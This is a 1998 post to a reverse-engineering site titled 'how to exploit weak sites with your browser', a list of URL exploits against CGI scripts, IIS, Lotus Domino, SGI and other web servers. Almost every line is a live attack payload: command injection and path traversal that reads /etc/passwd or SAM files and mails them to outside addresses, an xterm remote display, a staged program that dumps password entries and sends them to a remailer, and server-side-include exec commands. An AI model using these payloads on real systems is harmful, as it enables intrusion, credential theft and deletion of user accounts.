
courtesy of fravia+'s page of reverse engineering
12 November 1998
hi fravia+,
this is my collection of "how to exploit weak sites with your browser"
i'm working on a document which includes very new exploits .. i'll let you
know when it is ready ...
haveaniceday
RUDICARELL
# test cgi's
/cgi-bin/test-cgi?\whatever
/cgi-bin/test-cgi?\help&0a/bin/cat%20/etc/passwd
/cgi-bin/test-cgi?/*
/cgi-bin/test-cgi?* HTTP/1.0
/cgi-bin/test-cgi?x *
/cgi-bin/nph-test-cgi?* HTTP/1.0
/cgi-bin/nph-test-cgi?x *
# jj
/cgi-bin/jj?pwd=SDGROCKS&pop=0&name=rudi&adr=elder4&phone=4523534~/bin/ls
# betterones
/cgi-bin/info2www?(../../../../../../../bin/mail rudicarell@hotmail.com
</etc/passwd)
/cgi-bin/blabla?%0a/bin/cat%20/etc/passwd
/cgi-bin/finger?tiedotus@uta.fi%3B%2Fbin%2Fmail+rudicarell@hotmail.com+%3C+etc%2Fpasswd
/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
/cgi-bin/phf?%0a blablabla
&Qalias=&Qname=&Qemail=&Qnickname=&Qoffice_phone= ... usw
/cgi-bin/php.cgi?/etc/passwd
/cgi-bin/fi?/etc/passwd
/cgi-bin/wais.pl/set%20Gopher=/bin/cat%20/etc/passwd
/cgi-bin/webdist.cgi?/bin/mail%20:/etc/passwd[me@myhost.com]
/cgi-bin/textcounter.pl?/;IFS=\8;(ps ax;cd ..;cd ..;cd ..;cd etc;cat
hosts;set)\|echo;echo|
# other stuff
/dir/doit.phtml?/home/ftp/incoming/executemycode.phtml
/cgi-bin/AnyForm2? ...???
/cgi-bin/infogate? ...???
/cgi-bin/test.bat?&dir .... netscape server
/scripts/test.bat+%26dir+%26time+%26abracadabra.exe .... netscape
server
# microfuck
/guti.asp::$DATA asp ......
/global.asa asp ......
# long filenames :)
/somewhere/VERYLON~.HTM .... user save verylongyy.htm file
# quid pro quo server
/site.name/server%20logfile .... quid pro quo - server
# basic auth and others
/cgi-bin/www-sql/protected_directory/irgendwas.html
/cgi-bin/htmlscript?../../../../../../etc/passwd
/cgi-bin/campas?%0acat%0a/etc/passwd%0a
/cool-logs/mlog.html?screen=/etc/passwd
/cool-logs/mylog.html?screen=/etc/passwd
/cgi-bin/view-source?../../../../../../../etc/passwd
/cgi-bin/webgais
Content-length: (laenge des exploits)
query=';mail+rudicarell\@hotmail.com</etc/passwd;echo'&output=subject&domain=paragraph
# sgi silicon graphics
/cgi-bin/handler/carelli;cat /etc/passwd|?data=Download (sgis! nur
tabs!)
/cgi-bin/pfdispaly.cgi?'%0A/bin/uname%20-a|' (sgis!)
/cgi-bin/pfdispaly.cgi?/../../../../etc/motd (sgis! alte version)
/cgi-bin/aglimpse/80|IFS=5;CMD=5mail5rudicarell\@hotmail.com\</etc/passwd;eval$CMD;echo
# frontpage extensions
www.domain.com/beliebiges_directory/_vti_cnf = directory
www.domain.com/_vti_pvt = world writeable
# old but still working IIS perl.exe
nt/scripts/perl.exe?%20-e%20"system%20('dir%20c:\\winnt35\\repair');"
# example for bad perl oa
;xterm -display my.ip.address:0 &
john;echo "#include \"pwd.h\"">/tmp/shadow.c
john;echo "main(){struct passwd *p;while(p=getpwent())">>/tmp/shadow.c
john;echo
"printf(\"%s:%s:%d:%d:%s:%s:%s\\n\",p->pw-name,">>/tmp/shadow.c
john;echo "p->pw_passwd,p->pw_uid,p->pw_gid,p->pw_gecos,">>/tmp/shadow.c
john;echo "p->pw_dir,p->pw_shell);}">>/tmp/shadow.c
john;cc -o /tmp/shadow /tmp/shadow.c
john;/tmp/shadow>>/tmp/passwd
john;/bin/cat /tmp/passwd|/bin/mail remailer@some.remailer.com
john;rm /tmp/shadow*;rm /tmp/passwd
# sometimes its really bad
~root
~root/etc/passwd (zum beispiel)
altavista .... url:etc AND link:passwd ... oder ... root: 0:0
url:.htaccess .. oder .. url:.htpasswd
# NCSA files
httpd.conf configures the httpd service
srm.conf where scripts and documents reside
access.conf service features for all browsers
.htaccess Limits access on a directory-by-directory basis
http .... bla bla /.htaccess (NCSA .........)
# microfuck
http ... bla bla .. /scripts/blabla.bat?&dir+c:\+?&time
test.bat+%26dir+%26time+%26pfieffer.exe
# novell
http ... bla bla .. /files.pl? ../../blabla
http ... bla bla .. /scripts/convert.bas?../../any_file_on_sys_volume
# MAC WEBSTAR
http ... bla bla .. /M_A_C_H_T_T_P_V_E_R_S_I_O_N
# lotus domino server (this is really cool)
http ... /domcfg.nsf/?open
http ... /domcfg.nsf/URLRedirect/?OpenForm
http:... /database.nsf/viewname?SearchView&Query="*"
# nt carbo server ****
http://host/carbo.dll?icatcommand=..\..\winnt\win.ini&catalogname=catalog
#example for server side includes anon-ftp upload****
<!--#exec cmd="/bin/ls"-->
<!--#exec cmd="mail me@my.org < cat /etc/passwd"-->
<!--#exec cmd="chmod 777 ~ftp/incoming/uploaded_hack_script"-->
<!--#exec cmd="~ftp/incoming/uploaded_hack_script"-->
<!--#exec cmd="find / -name foobar -print"-->
<!--#include file="schweinenasenfile" -->
# metaweb servers
http://mail.server.com:5000/../smusers.txt
http://mail.server.com:5000/../../winnt/repair/sam._
http://mail.server.com:5000/../../winnt/system32/net.exe?
http://mail.server.com:5000/../../winnt/system32/net.exe?user%20joe%20/delete
port:2040 = javaconfig
port:5000 = mail
port:5001 = -"-
http://www.metainfo.com/products/sendmail/users.htm
http://www.metainfo.com/products/metaip/users.htm
# verity search software ******
s97_cgi.exe?Action=FormGen&ServerKey=Primary&Template=irgendwas (nt)
search97.vts?HLNavigate=On&querytext=dcm&ServerKey=Primary&ResultTemplate=../../../../../../../etc/hosts&ResultStyle=simple&ResultCount=20&collection=books
# uaaa |-) zhhhh wwwboard.html /wwwboard/passwd.txt ****
wwwadmin.pl oder wwwadmin.cgi
# cgi von hylafax ***
/cgi-bin/faxsurvey?/bin/ls%20-a
# other microfuck
uploader.exe/
# new lotus-domino
http://www.server.com/database.nsf/viewname?SearchView&Query="*"
/*end*/